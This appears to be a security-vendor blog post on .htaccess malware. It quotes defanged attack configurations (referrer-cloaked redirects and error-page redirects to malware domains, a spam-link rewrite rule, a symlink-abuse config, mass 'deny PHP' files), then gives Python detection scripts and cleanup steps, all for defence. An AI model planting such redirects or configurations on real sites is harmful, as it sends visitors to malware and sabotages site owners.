What is .htaccess Malware? (Detection, Symptoms & Prevention)


The .htaccess file is notorious for being targeted by attackers. Whether it’s using the file to hide malware, redirect search engines to other sites with black hat SEO tactics, or inject content — the range of possibilities for misuse is vast, making it a prime target for hackers.

.htaccess malware can be hard to pinpoint and clean up, since the file lets an attacker make multiple changes to the web server and its behavior. Furthermore, many site owners are unaware of this file because its name starts with a “.”, which makes it a hidden file. However, understanding the intricacies of the .htaccess file and its potential misuse is crucial for mitigating risk to your website. The stealthy nature of .htaccess malware, coupled with its ability to manipulate server behavior, makes it a silent yet potent threat.

In this post, we’ll explain what an .htaccess file is and why it’s such an attractive target for attackers. We’ll also cover some common examples of .htaccess malware and how to detect and respond to these threats to help protect your website and visitors.


What is an .htaccess file?

The .htaccess file is a very versatile and powerful configuration file specific to Apache server environments. It allows web administrators to make changes to the environment as a whole or on a per-directory basis. It can allow or deny access based on IP addresses, referrers, and user agents.

It is also used to enable things like “pretty permalinks” in WordPress environments with the use of mod_rewrite. It is a very flexible and useful file — and that’s precisely why attackers will misuse this file for their own goals.

Examples of .htaccess malware

Let’s take a look at some common examples of .htaccess malware that you may find if your site has been compromised.

.htaccess redirect malware

One of the more common attacks we’ve encountered is .htaccess redirects. This one redirects visitors arriving from search engines to malware using the following instruction set:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
..
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ hxxp://villusoftreit[.]ru/in.cgi?3 [R=301,L]

This script checks the referrer of anyone visiting the site from the search engines listed, and then redirects the visitor to a page serving malware (i.e. hxxp://villusoftreit[.]ru/in.cgi?3). Website owners are more likely to visit their website by entering the domain directly into their address bar rather than through a search engine, so the referrer conditions never match for them. This makes it less likely that the website owner will notice the infection until someone tells them about it.

Here’s another example of an .htaccess redirect:

# BEGIN WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* hxxp://globalpoweringgatheringon[.]com/in.php?n=30 [R,L]

Another common type of attack involving the .htaccess file is redirecting error pages to malware, which can be even harder to detect. This is because most of the website functions normally; the redirect only triggers on non-existent pages.

Here’s an example of what you’d find involving this type of attack:

RewriteEngine On
ErrorDocument 400 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 401 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 403 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 404 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 500 hxxp://powercrystal[.]ru/inject/index.php

Another example:

ErrorDocument 400 hxxp://arthurlundt.cz[.]cc/ht_er_docs/
ErrorDocument 403 hxxp://arthurlundt.cz[.]cc/ht_er_docs/
[…truncated…]
ErrorDocument 404 hxxp://nicomagen.cz[.]cc/ht_er_docs/
ErrorDocument 405 hxxp://nicomagen.cz[.]cc/ht_er_docs/

.htaccess used to generate spam links

Another way we have seen the .htaccess file abused is through spam link generation:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

This malware uses a regular expression that – when coupled with spam malware within the file structure – can generate hundreds of spam links on the website. This will then show up in Google and other search engine search results and harm the website’s SEO.
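The three patterns shown so far (referrer-gated redirects to another host, ErrorDocument entries pointing off-site, and catch-all rewrites that fold arbitrary paths into index.php with captured query parameters) can be triaged mechanically. The Python script below is an added example written for this post, not Sucuri’s tooling; the TRUSTED_HOSTS set, the *.invalid hostnames and the sample .htaccess text are constructed placeholders.

```python
"""Static triage of .htaccess content for the redirect, error-page and
spam-routing patterns discussed above (added example, not Sucuri's code)."""
import re
from dataclasses import dataclass

# Hosts this site legitimately redirects to; anything else is "external".
# Assumption: replace with your own domains.
TRUSTED_HOSTS = {"example.com", "www.example.com"}

# Substrings suggesting a RewriteCond keys on search-engine referrers.
SEARCH_ENGINE_HINT = re.compile(r"google|bing|yahoo|ask|msn|aol|baidu|yandex|duckduckgo", re.I)

# Absolute URL; also matches the defanged hxxp:// form used in write-ups.
ABS_URL = re.compile(r"^(?:https?|hxxps?)://([^/\s]+)", re.I)


@dataclass
class Finding:
    kind: str    # cloaked_redirect | external_redirect | error_page_redirect | param_routing
    line: int    # 1-based line number within the .htaccess text
    detail: str


def _external_host(url: str):
    """Return the host if `url` is absolute and outside TRUSTED_HOSTS, else None."""
    m = ABS_URL.match(url)
    if m and m.group(1).lower() not in TRUSTED_HOSTS:
        return m.group(1).lower()
    return None


def analyze_htaccess(text: str) -> list:
    findings = []
    pending_conds = []  # RewriteCond lines waiting for the RewriteRule they guard
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive, args = parts[0].lower(), parts[1:]

        if directive == "rewritecond" and len(args) >= 2:
            pending_conds.append((args[0].upper(), args[1]))

        elif directive == "rewriterule" and len(args) >= 2:
            pattern, target = args[0], args[1]
            flags = args[2] if len(args) > 2 else ""
            host = _external_host(target)
            if host:
                # A redirect guarded by referrer checks is cloaking: only visitors
                # arriving from the named referrers (search engines) ever see it.
                referrer_conds = [v for k, v in pending_conds if k == "%{HTTP_REFERER}"]
                cloaked = any(SEARCH_ENGINE_HINT.search(v) for v in referrer_conds)
                kind = "cloaked_redirect" if cloaked else "external_redirect"
                findings.append(Finding(kind, lineno, f"{pattern} -> {host} {flags}".strip()))
            elif "index.php?" in target and re.search(r"\$\d", target):
                # Arbitrary paths routed into index.php with captured query parameters:
                # the shape used to serve generated spam pages. Review it; some
                # legitimate plugins use the same technique.
                findings.append(Finding("param_routing", lineno, f"{pattern} -> {target}"))
            pending_conds = []  # conditions apply only to the rule that follows them

        elif directive == "errordocument" and len(args) >= 2:
            host = _external_host(args[1])
            if host:
                findings.append(Finding("error_page_redirect", lineno, f"{args[0]} -> {host}"))
    return findings


# Constructed sample mixing the three patterns with WordPress's stock rules.
# The *.invalid hosts are placeholders, not real indicators.
SAMPLE = """\
# BEGIN WordPress
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC]
RewriteRule .* http://redirect.invalid/in.php?n=30 [R,L]
ErrorDocument 404 http://errors.invalid/ht_er_docs/
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

if __name__ == "__main__":
    for f in analyze_htaccess(SAMPLE):
        print(f"line {f.line}: {f.kind}: {f.detail}")
```

Run it against every .htaccess under the document root (the stock WordPress block at the end of the sample produces no findings, so a clean file stays quiet). Treat cloaked_redirect and error_page_redirect as high-confidence; param_routing is a review prompt, since legitimate plugins sometimes route URLs the same way.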

A very common attack with WHM/cPanel environments is the misuse of symlinks. If symlink protection is disabled within WHM, attackers can use symlinks to move laterally throughout the environment and infect other websites or just create a flood of random spammy symlinks spread across the file structure.

This is made possible in part with the use of an .htaccess file placed in the directory in question:

Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php

This will instruct the server to follow symlinks to their destination and aid the attackers in spreading their malware throughout the environment.

.htaccess malware to deny access to website files

Another attack that we have seen a lot of recently is the abuse of .htaccess files to deny access to website files. For example, we have seen the attackers litter hundreds, or sometimes thousands of .htaccess files throughout the website file structure with the following:

<FilesMatch '.(php|php5|phtml)$'>
Order allow,deny
Deny from all
</FilesMatch>

This is a very simple .htaccess file which does nothing other than prevent PHP execution.

The file can function as a hardening measure when placed in a directory such as ./wp-content/uploads. When littered throughout the entire file structure, however, it disrupts the functionality of the website and renders the wp-admin panel useless: it blocks the website administrator from performing maintenance or updates, and can take down the entire website.

How to check for .htaccess malware on your website

Our free remote website scanner SiteCheck is able to detect many of these .htaccess attacks on your site. Simply enter your URL into the search bar and SiteCheck will scan your site for malicious code.

Remote scanners do have limitations, however. For a complete website scan you’ll also want to scan your website server and database for any suspicious code and indicators of compromise. Learn more about this functionality from our website monitoring page or chat with one of our experienced analysts to discuss implementation.
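A server-side sweep is the part a remote scanner cannot do. The Python script below is an added example, not Sucuri’s scanner: it walks a document root, hashes every .htaccess so that a flood of identical copies shows up as one hash with many paths, and flags the “deny PHP” block when it sits outside an allowlist of directories where it is expected hardening, as well as the FollowSymLinks / Indexes / AddType / AddHandler combination from the symlink example. The EXPECTED_DENY_DIRS allowlist and the sample directory tree it builds in a temporary folder are constructed for the demonstration.

```python
"""Sweep a document root for .htaccess files and triage each one
(added example, not Sucuri's scanner)."""
import hashlib
import os
import re
import tempfile
from collections import defaultdict

# Directories where a "deny PHP" .htaccess is expected hardening rather than
# sabotage. Assumption: adjust to your own layout.
EXPECTED_DENY_DIRS = {"wp-content/uploads"}

DENY_PHP = re.compile(r"<FilesMatch[^>]*php[^>]*>.*?Deny\s+from\s+all.*?</FilesMatch>", re.I | re.S)
PHP_AS_TEXT = re.compile(r"^\s*AddType\s+text/plain\s+\.php\b", re.I | re.M)
SSI_HANDLER = re.compile(r"^\s*AddHandler\s+server-parsed\s+\.php\b", re.I | re.M)


def _options_enable(text: str, name: str) -> bool:
    """True if an Options line switches `name` on (`+Name` or bare `Name`, not `-Name`)."""
    for line in text.splitlines():
        parts = line.split()
        if parts and parts[0].lower() == "options":
            for tok in parts[1:]:
                if not tok.startswith("-") and tok.lstrip("+").lower() == name.lower():
                    return True
    return False


def triage(text: str, rel_dir: str) -> list:
    """Flags for one .htaccess file located at `rel_dir` under the document root."""
    flags = []
    if DENY_PHP.search(text) and rel_dir not in EXPECTED_DENY_DIRS:
        flags.append("deny_php_outside_allowlist")  # breaks wp-admin when dropped everywhere
    if _options_enable(text, "FollowSymLinks"):
        flags.append("follow_symlinks")
    if _options_enable(text, "Indexes"):
        flags.append("dir_listing")
    if PHP_AS_TEXT.search(text):
        flags.append("php_as_text")   # PHP source served as plain text
    if SSI_HANDLER.search(text):
        flags.append("ssi_handler")   # .php handed to server-side includes
    return flags


def sweep(docroot: str) -> dict:
    """Walk `docroot`, hash every .htaccess and collect triage flags per directory."""
    report = {"files": [], "by_hash": defaultdict(list), "flags": []}
    for dirpath, _dirs, filenames in os.walk(docroot):
        if ".htaccess" not in filenames:
            continue
        rel_dir = os.path.relpath(dirpath, docroot).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        with open(os.path.join(dirpath, ".htaccess"), "rb") as fh:
            data = fh.read()
        report["files"].append(rel_dir)
        # Identical files cluster under one digest: a flood of copies is one hash, many paths.
        report["by_hash"][hashlib.sha256(data).hexdigest()[:12]].append(rel_dir)
        for flag in triage(data.decode("utf-8", "replace"), rel_dir):
            report["flags"].append((rel_dir, flag))
    return report


# ---- constructed sample tree (placeholder content, not a real site) ----
WP_DEFAULT = "RewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php$ - [L]\nRewriteRule . /index.php [L]\n"
DENY_FILE = '<FilesMatch "\\.(php|php5|phtml)$">\nOrder allow,deny\nDeny from all\n</FilesMatch>\n'
SYMLINK_FILE = ("Options +FollowSymLinks\nDirectoryIndex Index.html\nOptions +Indexes\n"
                "AddType text/plain .php\nAddHandler server-parsed .php\n")


def build_sample_tree() -> str:
    root = tempfile.mkdtemp(prefix="htaccess-sweep-")
    layout = {
        "": WP_DEFAULT,
        "wp-content/uploads": DENY_FILE,   # expected hardening
        "wp-admin": DENY_FILE,             # same file where it breaks the admin panel
        "wp-includes": DENY_FILE,
        "wp-content/themes/x": SYMLINK_FILE,
    }
    for rel, content in layout.items():
        os.makedirs(os.path.join(root, rel), exist_ok=True)
        with open(os.path.join(root, rel, ".htaccess"), "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    rep = sweep(build_sample_tree())
    print(f"{len(rep['files'])} .htaccess files")
    for digest, dirs in rep["by_hash"].items():
        print(f"  {digest} x{len(dirs)}: {dirs}")
    for rel_dir, flag in rep["flags"]:
        print(f"  FLAG {rel_dir or '/'}: {flag}")
```

FollowSymLinks on its own is common in legitimate .htaccess files (mod_rewrite needs it), so read the flags per file rather than individually: the symlink-abuse file trips four of them at once, while the stock WordPress block trips none. Point sweep() at a real document root to replace the sample tree.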

What to do if you find .htaccess malware

Detected malicious .htaccess behavior or related indicators of compromise? We’ve put together a comprehensive step-by-step guide on how to fix a hacked website.

As a quick recap, you’ll want to do the following if your site has malware:

  1. Analyze and identify all infected website files and components.
  2. Clean the malware from affected files.
  3. Remove malware from your website database.
  4. Check for and remove any website backdoors that may have been planted.
  5. Review user account access and delete unexpected admin users.
  6. Resubmit your site to Google and other search engines if you’ve been blocklisted.
  7. Update your website software including any unpatched CMS, plugins, or themes.
  8. Harden your CMS and install a web application firewall to prevent reinfections.

If you’ve been hacked and you need a hand cleaning up the infection, our experienced security analysts are available 24/7 to help clean up an infection. Reach out — they love to chat!

The best way to prevent an infection in the first place is to proactively implement security measures. That means hardening your website, using strong passwords for all of your accounts, and securing your site against vulnerabilities and threats. Sucuri offers a comprehensive website security service that can help you monitor your site and respond to threats.

Not sure about getting complete website security right now? Try our website firewall free for 30 days and see the results for yourself.

